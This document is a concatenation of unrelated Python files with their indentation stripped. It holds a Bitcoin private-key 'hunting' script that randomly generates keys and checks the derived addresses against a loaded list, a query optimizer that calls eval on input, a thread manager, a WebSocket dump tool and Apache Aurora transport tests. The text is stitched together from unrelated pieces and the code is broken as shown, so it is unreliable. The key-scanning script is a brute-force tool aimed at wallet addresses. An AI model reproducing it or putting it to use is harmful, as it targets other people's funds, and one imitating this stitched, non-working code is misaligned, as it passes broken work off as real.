Good Luck and Happy Hunting Bitcoin_randomCPU_Divison.py Version 1 scan randomly in Range Divsion with CPU Speed Improvments
https://mizogg.co.uk
'''
import secp256k1 as ice
import time, multiprocessing, random
from multiprocessing import pool, Event, Process, Queue, Value, cpu_count
from time import sleep
def hunt(start, stop, add, rangediv, display, cores='all'):
try:
available_cores = cpu_count()
if cores == 'all':
cores = available_cores
elif 0 < int(cores) <= available_cores:
cores = int(cores)
else:
cores = 1
counter = Value('L')
match = Event()
queue = Queue()
workers = []
for r in range(cores):
p = Process(target=main, args=(counter, start, stop, add, display, rangediv))
workers.append(p)
p.start()
for worker in workers:
worker.join()
except(KeyboardInterrupt, SystemExit):
exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
def main(counter, start, stop, add, display, rangediv):
count = 0
st = time.time()
sleep(0.00001)
while True:
try:
data = []
with counter.get_lock():
counter.value += 1
speed = round(counter.value/(time.time() - st))
cpuspeed = speed*rangediv
def data_wallet():
for i in range(0,rangediv):
percent = div * i
first = start+percent
last = start+first
ran= random.randrange(first,last)
seed = str(ran)
HEX = "%064x" % ran
wifc = ice.btc_pvk_to_wif(HEX)
wifu = ice.btc_pvk_to_wif(HEX, False)
caddr = ice.privatekey_to_address(0, True, int(seed)) #Compressed
uaddr = ice.privatekey_to_address(0, False, int(seed)) #Uncompressed
p2sh = ice.privatekey_to_address(1, True, int(seed)) #p2sh
bech32 = ice.privatekey_to_address(2, True, int(seed)) #bech32
data.append({
'seed': seed,
'HEX': HEX,
'wifc': wifc,
'wifu': wifu,
'caddr': caddr,
'uaddr': uaddr,
'p2sh': p2sh,
'bech32': bech32,
'percent': f"Hex scan Percent {i}%",
})
data = []
count += 1
remainingtotal=stop-start
div= round(remainingtotal / rangediv)
finish = div + start
data_wallet()
for data_w in data:
caddr = data_w['caddr']
uaddr = data_w['uaddr']
p2sh = data_w['p2sh']
bech32 = data_w['bech32']
if caddr in add or uaddr in add or p2sh in add or bech32 in add:
print('\nMatch Found IN : ', data_w['percent'])
print('\nPrivatekey (dec): ', data_w['seed'], '\nPrivatekey (hex): ', data_w['HEX'], '\nPrivatekey Uncompressed: ', data_w['wifu'], '\nPrivatekey compressed: ', data_w['wifc'], '\nPublic Address 1 Uncompressed: ', data_w['uaddr'], '\nPublic Address 1 compressed: ', data_w['caddr'], '\nPublic Address 3 P2SH: ', data_w['p2sh'], '\nPublic Address bc1 BECH32: ', data_w['bech32'])
with open("winner.txt", "a") as f:
f.write(f"""\nMatch Found IN {data_w['percent']}
Privatekey (dec): {data_w['seed']}
Privatekey (hex): {data_w['HEX']}
Privatekey Uncompressed: {data_w['wifu']}
Privatekey Compressed: {data_w['wifc']}
Public Address 1 Uncompressed: {data_w['uaddr']}
Public Address 1 Compressed: {data_w['caddr']}
Public Address 3 P2SH: {data_w['p2sh']}
Public Address bc1 BECH32: {data_w['bech32']}
=====Made by mizogg.co.uk Donations 3P7PZLbwSt2bqUMsHF9xDsaNKhafiGuWDB =====""")
else:
if display == 1:
print('Scan: ', count , ' : Keys/s : ', str(cpuspeed), end='\r')
elif display == 2:
for bad_wallet in data:
#print('\nPrivatekey (dec): ', bad_wallet['seed'], '\nPrivatekey (hex): ', bad_wallet['HEX'], '\nPrivatekey Uncompressed: ', bad_wallet['wifu'], '\nPrivatekey compressed: ', bad_wallet['wifc'], '\nPublic Address 1 Uncompressed: ', bad_wallet['uaddr'], '\nPublic Address 1 compressed: ', bad_wallet['caddr'], '\nPublic Address 3 P2SH: ', bad_wallet['p2sh'], '\nPublic Address bc1 BECH32: ', bad_wallet['bech32'])
print(bad_wallet['percent'], '\nPrivatekey (hex): ', bad_wallet['HEX'], end='\r')
else:
print("WRONG NUMBER!!! MUST CHOSE 1 or 2")
break
except(KeyboardInterrupt, SystemExit):
exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
if __name__ == '__main__':
print('[+] Starting.Bitcoin_randomCPU_Divison.py Please Wait.....Bitcoin Address List Loading.....')
filename ='puzzle.txt'
with open(filename) as f:
line_count = 0
for line in f:
line != "\n"
line_count += 1
with open(filename) as file:
add = file.read().split()
add = set(add)
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
howmany=int(input("Number of Cores CPU -> "))
start=int(input("start range Min 1-115792089237316195423570985008687907852837564279074904382605163141518161494335 -> "))
stop=int(input("stop range Max 115792089237316195423570985008687907852837564279074904382605163141518161494336 -> "))
rangediv=int(input("Division of Range 1% t0 ???% -> "))
display =int(input("Choose method Display Method: 1 - Less Details:(Quicker); 2 - More Details:(Slower) "))
print("Starting search... Please Wait min range: " + str(start))
print("Max range: " + str(stop))
print("==========================================================")
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
hunt(start, stop, add, rangediv, display, cores = howmany) |
query_optimizer.py | """
This file composes the functions that are needed to perform query optimization.
Currently, given a query, it does logical changes to forms that are sufficient conditions.
Using statistics from Filters module, it outputs the optimal plan (converted query with models needed to be used).
To see the query optimizer performance in action, simply run
python query_optimizer/query_optimizer.py
@Jaeho Bang
"""
# The query optimizer decide how to label the data points
# Load the series of queries from a txt file?
import sys
import os
import socket
import threading
import numpy as np
from itertools import product
from time import sleep
eva_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(eva_dir)
import constants
class QueryOptimizer:
"""
TODO: If you have a classifier for =, you can make a classifier for !=
TODO: Deal with parenthesis
"""
def __init__(self, ip_str="127.0.0.1"):
self.ip_str = ip_str
#self.startSocket()
self.operators = ["!=", ">=", "<=", "=", "<", ">"]
self.separators = ["||", "&&"]
def startSocket(self):
thread = threading.Thread(target=self.inputQueriesFromSocket)
thread.daemon = True
thread.start()
while True:
input = eval(input('Type in your query in the form of __label__ > __number__\n'))
self.parseInput(input)
def parseInput(self, input):
"""
TODO: Need to provide query formats that can be used
:param input: string to be parsed
:return: something that the Load() class can understand
"""
pass
def inputQueriesFromTxt(self, input_path):
"""
TODO: Read the file line by line, use self.parseInput to give back commands
:param input_path: full directory + file name
:return: method of training the pps
"""
pass
def inputQueriesFromSocket(self):
sock = socket.socket()
sock.bind(self.ip_str, 123)
sock.listen(3)
print("Waiting on connection")
conn = sock.accept()
print("Client connected")
while True:
m = conn[0].recv(4096)
conn[0].send(m[::-1])
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def _findParenthesis(self, query):
start = []
end = []
query_copy = query
index = query_copy.find("(")
while index != -1:
start.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find("(")
query_copy = query
index = query_copy.find(")")
while index != -1:
end.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find(")")
return [start, end]
def _parseQuery(self, query):
"""
Each sub query will be a list
There will be a separator in between
:param query:
:return:
"""
query_parsed = []
query_subs = query.split(" ")
query_operators = []
for query_sub in query_subs:
if query_sub == "||" or query_sub == "&&":
query_operators.append(query_sub)
else:
if True not in [operator in self.operators for operator in query_sub]:
return [],[]
for operator in self.operators:
query_sub_list = query_sub.split(operator)
if type(query_sub_list) is list and len(query_sub_list) > 1:
query_parsed.append([query_sub_list[0], operator, query_sub_list[1]])
break
#query_parsed ex: [ ["t", "=", "van"], ["s", ">", "60"]]
#query_operators ex: ["||", "||", "&&"]
return query_parsed, query_operators
def _logic_reverse(self, str):
if str == "=":
return "!="
elif str == "!=":
return "="
elif str == ">":
return "<="
elif str == ">=":
return "<"
elif str == "<":
return ">="
elif str == "<=":
return ">"
def convertL2S(self, parsed_query, query_ops):
final_str = ""
index = 0
for sub_parsed_query in parsed_query:
if len(parsed_query) >= 2 and index < len(query_ops):
final_str += ''.join(sub_parsed_query) + " " + query_ops[index] + " "
index += 1
else:
final_str += ''.join(sub_parsed_query)
return final_str
def _wrangler(self, query, label_desc):
"""
import itertools
iterables = [ [1,2,3,4], [88,99], ['a','b'] ]
for t in itertools.product(*iterables):
print t
Different types of checks are performed
1. not equals check (f(C) != v)
2. comparison check (f(C) > v -> f(C) > t, for all t <= v)
3. Range check (v1 <= f(C) <= v2) - special type of comparison check
4. No-predicates = when column in finite and discrete, it can still benefit
ex) 1 <=> type = car U type = truck U type = SUV
:return: transformed query
"""
#TODO: Need to implement range check
query_parsed, query_operators = self._parseQuery(query)
#query_sorted = sorted(query_parsed)
query_transformed = []
equivalences = []
equivalences_op = []
for query_sub_list in query_parsed:
subject = query_sub_list[0]
operator = query_sub_list[1]
object = query_sub_list[2]
assert(subject in label_desc) # Label should be in label description dictionary
l_desc = label_desc[subject]
if l_desc[0] == constants.DISCRETE:
equivalence = [self.convertL2S([query_sub_list], [])]
assert(operator == "=" or operator == "!=")
alternate_string = ""
for category in l_desc[1]:
if category != object:
alternate_string += subject + self._logic_reverse(operator) + category + " && "
alternate_string = alternate_string[:-len(" && ")] #must strip the last ' || '
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
elif l_desc[0] == constants.CONTINUOUS:
equivalence = [self.convertL2S([query_sub_list], [])]
assert(operator == "=" or operator == "!=" or operator == "<"
or operator == "<=" or operator == ">" or operator == ">=")
alternate_string = ""
if operator == "!=":
alternate_string += subject + ">" + object + " && " + subject + "<" + object
query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(query_tmp)
if operator == "<" or operator == "<=":
object_num = eval(object)
for number in l_desc[1]:
if number > object_num:
alternate_string = subject + operator + str(number)
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
if operator == ">" or operator == ">=":
object_num = eval(object)
for number in l_desc[1]:
if number < object_num:
alternate_string = subject + operator + str(number)
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
equivalences.append(equivalence)
possible_queries = product(*equivalences)
for q in possible_queries:
query_transformed.append( q )
return query_transformed, query_operators
def _compute_expression(self, query_info, pp_list, pp_stats, k, accuracy_budget):
"""
def QueryOptimizer(P, {trained PPs}):
P = wrangler(P)
{E} = compute_expressions(P,{trained PP},k) #k is a fixed constant which limits number of individual PPs
in the final expression
for E in {E}:
Explore_PP_accuracy_budget(E) # Paper says dynamic program
Explore_PP_Orderings(E) #if k is small, any number of orders can be explored
Compute_cost_vs_red_rate(E) #arithmetic over individual c,a and r[a] numbers
return E_with_max_c/r
1. p^(P/p) -> PPp
2. PPp^q -> PPp ^ PPq
3. PPpvq -> PPp v PPq
4. p^(P/p) -> ~PP~q
-> we don't need to apply these rules, we simply need to see for each sub query which PP gives us the best rate
:param query_info: [possible query forms for a given query, operators that go in between]
:param pp_list: list of pp names that are currently available
:param pp_stats: list of pp models associated with each pp name with R,C,A values saved
:param k: number of pps we can use at maximum
:return: the list of pps to use that maximizes reduction rate (ATM)
"""
evaluations = []
evaluation_models = []
evaluations_stats = []
query_transformed, query_operators = query_info
#query_transformed = [[["t", "!=", "car"], ["t", "=", "van"]], ... ]
for possible_query in query_transformed:
evaluation = []
evaluation_stats = []
k_count = 0
op_index = 0
for query_sub in possible_query: #Even inside query_sub it can be divided into query_sub_sub
if k_count > k: #TODO: If you exceed a certain number, you just ignore the expression
evaluation = []
evaluation_stats = []
continue
query_sub_list, query_sub_operators = self._parseQuery(query_sub)
evaluation_tmp = []
evaluation_models_tmp = []
evaluation_stats_tmp = []
for i in range(len(query_sub_list)):
query_sub_str = ''.join(query_sub_list[i])
if query_sub_str in pp_list:
#Find the best model for the pp
data = self._find_model(query_sub_str, pp_stats, accuracy_budget)
if data == None:
continue
else:
model, reduction_rate = data
evaluation_tmp.append(query_sub_str)
evaluation_models_tmp.append(model) #TODO: We need to make sure this is the model_name
evaluation_stats_tmp.append(reduction_rate)
k_count += 1
reduc_rate = 0
if len(evaluation_stats_tmp) != 0:
reduc_rate = self._update_stats(evaluation_stats_tmp, query_sub_operators)
evaluation.append(query_sub)
evaluation_models.append(evaluation_models_tmp)
evaluation_stats.append(reduc_rate)
op_index += 1
evaluations.append( self.convertL2S(evaluation, query_operators) )
evaluations_stats.append( self._update_stats(evaluation_stats, query_operators) )
max_index = np.argmax(np.array(evaluations_stats), axis = 0)
best_query = evaluations[max_index] #this will be something like "t!=bus && t!=truck && t!=car"
best_models = evaluation_models[max_index]
best_reduction_rate = evaluations_stats[max_index]
pp_names, op_names = self._convertQuery2PPOps(best_query)
return [list(zip(pp_names, best_models)), op_names, best_reduction_rate]
def _convertQuery2PPOps(self, query):
"""
:param query: str (t!=car && t!=truck)
:return:
"""
query_split = query.split(" ")
pp_names = []
op_names = []
for i in range(len(query_split)):
if i % 2 == 0:
pp_names.append(query_split[i])
else:
if query_split[i] == "&&":
op_names.append(np.logical_and)
else:
op_names.append(np.logical_or)
return pp_names, op_names
#Make this function take in the list of reduction rates and the operator lists
def _update_stats(self, evaluation_stats, query_operators):
if len(evaluation_stats) == 0:
return 0
final_red = evaluation_stats[0]
assert(len(evaluation_stats) == len(query_operators) + 1)
for i in range(1, len(evaluation_stats)):
if query_operators[i - 1] == "&&":
final_red = final_red + evaluation_stats[i] - final_red * evaluation_stats[i]
elif query_operators[i - 1] == "||":
final_red = final_red * evaluation_stats[i]
return final_red
def _compute_cost_red_rate(self, C, R):
assert(R >= 0 and R <= 1) #R is reduction rate and should be between 0 and 1
if R == 0:
R = 0.000001
return float(C) / R
def _find_model(self, pp_name, pp_stats, accuracy_budget):
possible_models = pp_stats[pp_name]
best = [] #[best_model_name, best_model_cost / best_model_reduction_rate]
for possible_model in possible_models:
if possible_models[possible_model]["A"] < accuracy_budget:
continue
if best == []:
best = [possible_model, self._compute_cost_red_rate(possible_models[possible_model]["C"],
possible_models[possible_model]["R"]),
possible_models[possible_model]["R"]]
else:
alternative_best_cost = self._compute_cost_red_rate(possible_models[possible_model]["C"],
possible_models[possible_model]["R"])
if alternative_best_cost < best[1]:
best = [possible_model, alternative_best_cost, possible_models[possible_model]["R"]]
if best == []:
return None
else:
return best[0], best[2]
def run(self, query, pp_list, pp_stats, label_desc, k = 3, accuracy_budget = 0.9):
"""
:param query: query of interest ex) TRAF-20
:param pp_list: list of pp_descriptions - queries that are available
:param pp_stats: this will be dictionary where keys are "pca/ddn",
it will have statistics saved which are R (reduction_rate), C (cost_to_train), A (accuracy)
:param k: number of different PPs that are in any expression E
:return: selected PPs to use for reduction
"""
query_transformed, query_operators = self._wrangler(query, label_desc)
#query_transformed is a comprehensive list of transformed queries
return self._compute_expression([query_transformed, query_operators], pp_list, pp_stats, k, accuracy_budget)
if __name__ == "__main__":
query_list = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
"t=van && s>60 && s<65", "c!=white && (t=sedan || t=truck)",
"i=pt335 && o!=pt211 && o!=pt208", "t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211", "t!=suv && t!=van && c!=red && t!=white",
"(i=pt335 || i=pt342) && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
#TODO: Support for parenthesis queries
query_list_mod = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
"t=van && s>60 && s<65", "t=sedan || t=truck && c!=white",
"i=pt335 && o!=pt211 && o!=pt208", "t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211", "t!=suv && t!=van && c!=red && t!=white",
"i=pt335 || i=pt342 && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
query_list_test = ["c=white && t!=suv && t!=van"]
synthetic_pp_list = ["t=suv", "t=van", "t=sedan", "t=truck",
"c=red", "c=white", "c=black", "c=silver",
"s>40", "s>50", "s>60", "s<65", "s<70",
"i=pt335", "i=pt211", "i=pt342", "i=pt208",
"o=pt335", "o=pt211", "o=pt342", "o=pt208"]
query_list_short = ["t=van && s>60 && o=pt211"]
synthetic_pp_list_short = ["t=van", "s>60", "o=pt211"]
#TODO: Might need to change this to a R vs A curve instead of static numbers
#TODO: When selecting appropriate PPs, we only select based on reduction rate
synthetic_pp_stats_short = {"t=van" :{ "none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
"s>60" :{ "none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"o=pt211" :{ "none/dnn": {"R": 0.13, "C": 0.32, "A": 0.99},
"none/kde": {"R": 0.14, "C": 0.12, "A": 0.93}} }
synthetic_pp_stats = {"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
"t=suv": {"none/svm": {"R": 0.13, "C": 0.01, "A": 0.95}},
"t=sedan": {"none/svm": {"R": 0.21, "C": 0.01, "A": 0.94}},
"t=truck": {"none/svm": {"R": 0.05, "C": 0.01, "A": 0.99}},
"c=red": {"none/svm": {"R": 0.131, "C": 0.011, "A": 0.951}},
"c=white": {"none/svm": {"R": 0.212, "C": 0.012, "A": 0.942}},
"c=black": {"none/svm": {"R": 0.133, "C": 0.013, "A": 0.953}},
"c=silver": {"none/svm": {"R": 0.214, "C": 0.014, "A": 0.944}},
"s>40": {"none/svm": {"R": 0.08, "C": 0.20, "A": 0.8}},
"s>50": {"none/svm": {"R": 0.10, "C": 0.20, "A": 0.82}},
"s>60": {"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"s<65": {"none/svm": {"R": 0.05, "C": 0.20, "A": 0.8}},
"s<70": {"none/svm": {"R": 0.02, "C": 0.20, "A": 0.9}},
"o=pt211": {"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123, "A": 0.932}},
"o=pt335": {"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124, "A": 0.934}},
"o=pt342": {"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125, "A": 0.935}},
"o=pt208": {"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126, "A": 0.936}},
"i=pt211": {"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123, "A": 0.932}},
"i=pt335": {"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124, "A": 0.934}},
"i=pt342": {"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125, "A": 0.935}},
"i=pt208": {"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126, "A": 0.936}}}
#TODO: We will need to convert the queries/labels into "car, bus, van, others". This is how the dataset defines things
label_desc = {"t": [constants.DISCRETE, ["sedan", "suv", "truck", "van"]],
"s": [constants.CONTINUOUS, [40, 50, 60, 65, 70]],
"c": [constants.DISCRETE, ["white", "red", "black", "silver"]],
"i": [constants.DISCRETE, ["pt335", "pt342", "pt211", "pt208"]],
"o": [constants.DISCRETE, ["pt335", "pt342", "pt211", "pt208"]]}
qo = QueryOptimizer()
print("Running Query Optimizer Demo...")
for query in query_list_mod:
print(query, " -> ", (qo.run(query, synthetic_pp_list, synthetic_pp_stats, label_desc)) )
#print qo.run(query, synthetic_pp_list_short, synthetic_pp_stats_short, label_desc)
|
thread_manager.py | from threading import Thread
class ThreadsManager:
def __init__(self):
self.results = []
self.thread_pool = []
def init_thread_pool(self, query, crawlers):
"""
Method to create threads and assign crawlers to each
of the threads. Each thread then will start processing
the query and once all the threads join, the results will
be returned
:param query:
:param crawlers:
:return: data:[LibraryResult] => results from the crawlers
"""
for crawler in crawlers:
thread = Thread(target=crawler, args=[query, self.results])
self.thread_pool.append(thread)
thread.start()
for thread in self.thread_pool:
thread.join()
return self.results
|
wsdump.py | #!/usr/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
test_transport.py | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from threading import Thread
import pytest
import requests
from mock import ANY, Mock, call, create_autospec
from requests import exceptions as request_exceptions
from thrift.protocol import TBinaryProtocol
from thrift.server import THttpServer
from thrift.transport import TTransport
from apache.aurora.common.transport import DEFAULT_USER_AGENT, TRequestsTransport
from gen.apache.aurora.api import ReadOnlyScheduler
from gen.apache.aurora.api.ttypes import Response, ResponseCode, ServerInfo
class ReadOnlySchedulerHandler(object):
def getRoleSummary(self): # noqa
server_info = ServerInfo(clusterName='west')
return Response(responseCode=ResponseCode.OK, serverInfo=server_info)
def test_request_transport_integration():
handler = ReadOnlySchedulerHandler()
processor = ReadOnlyScheduler.Processor(handler)
pfactory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
server_thread = Thread(target=server.serve)
server_thread.start()
_, server_port = server.httpd.socket.getsockname()
try:
transport = TRequestsTransport('http://localhost:%d' % server_port)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
response = client.getRoleSummary()
finally:
server.httpd.shutdown()
assert response is not None
assert response.responseCode == ResponseCode.OK
assert response.serverInfo.clusterName == 'west'
transport.close()
def test_request_transport_timeout():
session = create_autospec(spec=requests.Session, instance=True)
session.headers = {}
session.post = Mock(side_effect=request_exceptions.Timeout())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
with pytest.raises(TTransport.TTransportException) as execinfo:
client.getRoleSummary()
assert execinfo.value.message == 'Timed out talking to http://localhost:12345'
transport.close()
def test_raise_for_status_causes_exception():
response = requests.Response()
response.status_code = 503
session = create_autospec(spec=requests.Session, instance=True)
session.headers = {}
session.post.return_value = response
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
with pytest.raises(TTransport.TTransportException) as excinfo:
client.getRoleSummary()
assert excinfo.value.type == TTransport.TTransportException.UNKNOWN
assert excinfo.value.message.startswith('Unknown error talking to http://localhost:12345')
transport.close()
def test_raises_auth_error():
response = requests.Response()
response.status_code = 401
session = create_autospec(spec=requests.Session, instance=True)
session.headers = {}
session.post.return_value = response
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
with pytest.raises(TRequestsTransport.AuthError):
client.getRoleSummary()
transport.close()
def test_request_any_other_exception():
session = create_autospec(spec=requests.Session, instance=True)
session.headers = {}
session.post = Mock(side_effect=request_exceptions.ConnectionError())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
with pytest.raises(TTransport.TTransportException):
client.getRoleSummary()
transport.close()
def test_requests_transports_lowers_logging_level():
logging.getLogger('requests').setLevel(logging.NOTSET)
TRequestsTransport(
'http://localhost:12345',
session_factory=lambda x: create_autospec(spec=requests.Session, instance=True))
assert logging.getLogger('requests').level == logging.WARNING
def test_transport_applies_user_agent_from_factory():
user_agent = 'Some-User-Agent'
transport = TRequestsTransport('http://localhost:12345', user_agent=user_agent)
transport.open()
assert transport._session.headers['User-Agent'] == user_agent
def test_transport_applies_default_user_agent_if_no_factory_provided():
transport = TRequestsTransport('http://localhost:12345')
transport.open()
assert transport._session.headers['User-Agent'] == DEFAULT_USER_AGENT
def test_auth_type_valid():
response = requests.Response()
response.status_code = 500
session = create_autospec(spec=requests.Session, instance=True)
session.headers = {}
session.post.return_value = response
auth = requests.auth.AuthBase()
transport = TRequestsTransport('http://localhost:1', auth=auth, session_factory=lambda: session)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
with pytest.raises(TTransport.TTransportException):
client.getRoleSummary()
transport.close()
session.post.mock_calls = (call(ANY, data=ANY, timeout=ANY, auth=auth))
def test_auth_type_invalid():
with pytest.raises(TypeError) as e:
TRequestsTransport('http://localhost:1', auth="auth")
assert e.value.message == 'Invalid auth type. Expected: AuthBase but got str'
def test_requests_transport_session_reuse():
handler = ReadOnlySchedulerHandler()
processor = ReadOnlyScheduler.Processor(handler)
pfactory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
server_thread = Thread(target=server.serve)
server_thread.start()
_, server_port = server.httpd.socket.getsockname()
try:
transport = TRequestsTransport('http://localhost:%d' % server_port)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
client = ReadOnlyScheduler.Client(protocol)
client.getRoleSummary()
old_session = transport._session
client.getRoleSummary()
finally:
server.httpd.shutdown()
assert old_session == transport._session
transport.close()
|
